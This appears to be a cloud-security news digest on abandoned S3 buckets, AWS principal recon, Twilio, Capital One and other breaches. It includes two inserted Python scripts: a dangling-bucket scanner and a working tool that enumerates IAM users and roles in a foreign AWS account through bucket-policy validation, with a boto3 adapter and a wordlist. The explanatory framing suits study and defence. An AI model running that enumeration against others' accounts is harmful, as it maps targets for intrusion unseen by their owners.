Here’s all the ways an abandoned cloud instance can cause security issues

Research released Tuesday by watchTowr shows how easily an abandoned storage bucket can be taken over and repurposed by attackers.

The post Here’s all the ways an abandoned cloud instance can cause security issues appeared first on CyberScoop.


Supply Chain Attack: Abandoned S3 Buckets Used for Malicious Payloads

By Deeba Ahmed
Threat actors have been taking over abandoned S3 buckets to serve malicious binaries, steal login credentials and more.
This is a post from HackRead.com.
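The two items above describe the same mechanism: when an S3 bucket is deleted its name returns to the global namespace, anyone can re-create it, and installers, build scripts and update URLs that still point at the old name will fetch whatever the new owner uploads. The script below is an added example, not code from watchTowr, HackRead or the articles; it pulls bucket names out of the three URL forms a code base usually contains and classifies each with the unauthenticated HEAD request anyone can send: 404 means the name is unclaimed, 403 or 200 means a bucket with that name exists (private or listable). The HTTP call is pluggable so the module runs offline against constructed statuses; the bucket names, the sample snippet and the `FAKE_STATUS` table are all invented.

```python
"""Find S3 bucket references in text and check whether each bucket still exists.

Added example. A deleted bucket's name returns to the global pool and anyone
can re-create it; a script or update URL that still names it will then fetch
whatever the new owner uploads. The check is the unauthenticated HEAD anyone
can send to the virtual-hosted endpoint: 404 = NoSuchBucket (claimable),
403 = exists but private, 200 = exists and listing is public.
"""
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, List

# Constructed sample: three URL shapes typically found in a code base.
SAMPLE_TEXT = """
curl -o tool.tgz https://acme-release-artifacts.s3.amazonaws.com/v2/tool.tgz
aws s3 cp s3://acme-old-installers/setup.sh .
WHEEL_INDEX = "https://s3.eu-west-1.amazonaws.com/acme-python-wheels/simple/"
https://s3.amazonaws.com/acme-old-installers/bootstrap.sh
"""

_NAME = r"([a-z0-9][a-z0-9.-]{1,61}[a-z0-9])"  # S3 bucket naming rules, roughly
_PATTERNS = [
    # virtual-hosted: https://<bucket>.s3.amazonaws.com/ or .s3.<region>.amazonaws.com/
    re.compile(r"https?://" + _NAME + r"\.s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com"),
    # path-style: https://s3.amazonaws.com/<bucket>/ or s3.<region>.amazonaws.com/<bucket>/
    re.compile(r"https?://s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com/" + _NAME),
    # s3:// URIs used by the AWS CLI and SDKs
    re.compile(r"s3://" + _NAME),
]


def extract_buckets(text: str) -> List[str]:
    """Unique bucket names referenced in `text`, sorted."""
    found: List[str] = []
    for pat in _PATTERNS:
        for m in pat.finditer(text):
            if m.group(1) not in found:
                found.append(m.group(1))
    return sorted(found)


def head_status(url: str) -> int:
    """Unauthenticated HEAD; returns the HTTP status, or -1 on a transport error
    (e.g. the TLS hostname mismatch you get for bucket names containing dots)."""
    req = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code
    except urllib.error.URLError:
        return -1


def classify(bucket: str, status_of: Callable[[str], int] = head_status) -> str:
    """Map the HEAD status of the bucket's virtual-hosted endpoint to a verdict."""
    status = status_of(f"https://{bucket}.s3.amazonaws.com/")
    if status == 404:
        return "UNCLAIMED"          # NoSuchBucket: anyone can create this name
    if status == 403:
        return "EXISTS_PRIVATE"     # bucket exists, listing denied
    if status == 200:
        return "EXISTS_LISTABLE"    # bucket exists and listing is public
    if status in (301, 307):
        return "EXISTS_OTHER_REGION"  # redirect: exists, served from elsewhere
    return f"UNKNOWN({status})"


def scan(text: str, status_of: Callable[[str], int] = head_status) -> Dict[str, str]:
    """Bucket name -> verdict for every reference found in `text`."""
    return {b: classify(b, status_of) for b in extract_buckets(text)}


# Constructed stand-in for the network: pretend acme-old-installers was deleted.
FAKE_STATUS = {
    "https://acme-release-artifacts.s3.amazonaws.com/": 403,
    "https://acme-old-installers.s3.amazonaws.com/": 404,
    "https://acme-python-wheels.s3.amazonaws.com/": 200,
}


def demo() -> Dict[str, str]:
    """Offline run over the constructed snippet."""
    return scan(SAMPLE_TEXT, FAKE_STATUS.__getitem__)


if __name__ == "__main__":
    for bucket, verdict in demo().items():
        print(f"{verdict:20} {bucket}")
```

To run it over a real tree, feed file contents to `scan()` with the default `head_status`; every `UNCLAIMED` name is a dangling reference to remove, or a bucket to re-create under your own account before someone else does. Names containing dots do not match the wildcard certificate on the virtual-hosted endpoint, so check those with a path-style URL instead.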

Sneaky recon on roster of AWS users is possible, Unit 42 says

Knowing exactly who manages a certain cloud service can be valuable information for malicious hackers, and a cybersecurity company says it has found that kind of weakness in products run by one of the biggest cloud providers. More than 20 application programming interfaces (APIs) associated with 16 Amazon Web Services products can be abused to give up basic information about users and their roles, according to Unit 42, the research arm of cybersecurity giant Palo Alto Networks. “A malicious actor may obtain the roster of an account, learn the organization’s internal structure” and then perhaps “launch targeted attacks against individuals,” Unit 42 researcher Jay Chen says in a report released Tuesday morning. Palo Alto Networks says AWS gave permission to release the research. The problem is within a feature that validates “resource-based policies” for services such as the commonly used Amazon Simple Storage Service (S3), Unit 42 says. A resource-based policy is basically a […]

The post Sneaky recon on roster of AWS users is possible, Unit 42 says appeared first on CyberScoop.

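The feature Unit 42 describes works like this: when a resource-based policy (an S3 bucket policy, for instance) names an IAM user or role in another account as its Principal, AWS validates that principal at attach time and rejects the policy if it does not exist. The probe is an API call in the prober's own account against the prober's own bucket, so the target account's CloudTrail records nothing. The script below is an added illustration of that probe loop, not Unit 42's tooling; the AWS call is factored out behind a callable so the module runs offline against a constructed set of "existing" principals, and the account ID, wordlist and bucket name are invented. The boto3 adapter assumes S3 reports a missing principal as error code `MalformedPolicy` with the message "Invalid principal in policy"; treat that exact string as an assumption to verify.

```python
"""IAM principal enumeration via resource-policy validation (added example).

AWS validates the Principal element of a bucket policy when it is attached:
a policy naming a non-existent user or role is rejected, one naming an
existing principal is accepted. The probe runs entirely in the prober's
account, so the target account sees no API calls.
"""
import json
from typing import Callable, Dict, List

# Hypothetical wordlist of principal names to try in the target account.
CANDIDATES = ["admin", "deploy", "jenkins", "terraform", "readonly", "backup"]


def candidate_arns(account_id: str, names: List[str]) -> List[str]:
    """Expand a name list into both user and role ARNs for one account."""
    arns: List[str] = []
    for n in names:
        arns.append(f"arn:aws:iam::{account_id}:user/{n}")
        arns.append(f"arn:aws:iam::{account_id}:role/{n}")
    return arns


def probe_policy(bucket: str, principal_arn: str) -> str:
    """Bucket policy that names `principal_arn` but grants it nothing: an
    explicit Deny on a prefix nobody uses. Its only job is to trigger
    principal validation; it still has to be removed afterwards."""
    doc = {
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "PrincipalProbe",
            "Effect": "Deny",
            "Principal": {"AWS": principal_arn},
            "Action": "s3:GetObject",
            "Resource": f"arn:aws:s3:::{bucket}/does-not-exist-probe/*",
        }],
    }
    return json.dumps(doc)


class InvalidPrincipal(Exception):
    """Raised by the put-policy callable when AWS rejects the principal."""


def enumerate_principals(bucket: str, arns: List[str],
                         put_policy: Callable[[str, str], None]) -> Dict[str, bool]:
    """Return {arn: exists}. `put_policy(bucket, policy_json)` must raise
    InvalidPrincipal for a non-existent principal and return otherwise."""
    found: Dict[str, bool] = {}
    for arn in arns:
        try:
            put_policy(bucket, probe_policy(bucket, arn))
            found[arn] = True
        except InvalidPrincipal:
            found[arn] = False
    return found


def boto3_put_policy(bucket: str, policy: str) -> None:
    """Real adapter (needs boto3 and credentials for the prober's account).
    Assumption: S3 answers a non-existent principal with error code
    MalformedPolicy and message 'Invalid principal in policy'."""
    import boto3
    from botocore.exceptions import ClientError
    s3 = boto3.client("s3")
    try:
        s3.put_bucket_policy(Bucket=bucket, Policy=policy)
    except ClientError as e:
        err = e.response.get("Error", {})
        if err.get("Code") == "MalformedPolicy" and "Invalid principal" in err.get("Message", ""):
            raise InvalidPrincipal(policy) from e
        raise


# Constructed stand-in for AWS so the module runs offline.
EXISTING = {  # what the pretend target account really contains
    "arn:aws:iam::123456789012:user/admin",
    "arn:aws:iam::123456789012:role/deploy",
    "arn:aws:iam::123456789012:role/terraform",
}


def fake_put_policy(bucket: str, policy: str) -> None:
    """Mimics attach-time validation against the constructed directory."""
    principal = json.loads(policy)["Statement"][0]["Principal"]["AWS"]
    if principal not in EXISTING:
        raise InvalidPrincipal(principal)


def demo() -> List[str]:
    """Probe the constructed account; return only the principals that exist."""
    result = enumerate_principals("prober-owned-bucket",
                                  candidate_arns("123456789012", CANDIDATES),
                                  fake_put_policy)
    return sorted(arn for arn, exists in result.items() if exists)


if __name__ == "__main__":
    for arn in demo():
        print("exists:", arn)
```

Each probe overwrites whatever policy the probe bucket had, so use a dedicated empty bucket and delete the policy when done. On the defending side there is nothing to alert on, because the calls never touch the target account; the remaining options are hygiene, namely removing unused users and roles and avoiding guessable principal names.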

Twilio breach spotlights struggle to keep corporate software kits out of the wrong hands

The security team at Twilio, a cloud communications company that claimed over $1 billion in revenue last year, could breathe a sigh of relief on Sunday night. Earlier in the day, someone had manipulated the code in a software product that Twilio customers use to route calls and other communications. The breach resembled a Magecart-style attack that skims websites for users’ financial data. Twilio cleaned up the code hours later, and said there was no sign the attackers had accessed customer data. But the damage could have been worse if the attack had been targeted, multiple security experts told CyberScoop. With access to the code, which was sitting in an unsecured Amazon S3 storage bucket, the attackers could have conducted phishing attacks or distributed malware through the platform, according to Yonathan Klijnsma, head of threat research at security company RiskIQ. Dave Kennedy, founder of cybersecurity […]

The post Twilio breach spotlights struggle to keep corporate software kits out of the wrong hands appeared first on CyberScoop.


RSAC 2020: Another Smart Baby Monitor Vulnerable to Remote Hackers

A popular baby monitor has been found riddled with vulnerabilities that give attackers full access to personal information and sensitive video footage.

Data about inmates and jail staff spilled by leaky prison app

A web-mapping project came across detainees’ prescriptions and other PII that could be used by identity thieves to victimize prisoners.

What Capital One’s cybersecurity team did (and did not) get right

There was no months-old, unpatched Apache flaw. An S3 bucket wasn’t publicly accessible to anyone with an internet connection. There was no effort to hide what happened behind the company’s bug bounty program. When taken at face value, the Capital One breach looks awfully similar to other massive security failures that have made national news in the past few years. But while people fixate on the amount of information taken, there are some in cybersecurity circles who see a silver lining in the way the bank has handled the incident. Multiple security experts told CyberScoop that while the incident is clearly severe and there are still questions that need to be answered, actions taken by the Virginia-based bank, which did not respond to CyberScoop’s request for comment, prevented this breach from becoming another example of extreme corporate cybersecurity negligence. “While it’s tempting to knock Capital One for this […]

The post What Capital One’s cybersecurity team did (and did not) get right appeared first on CyberScoop.
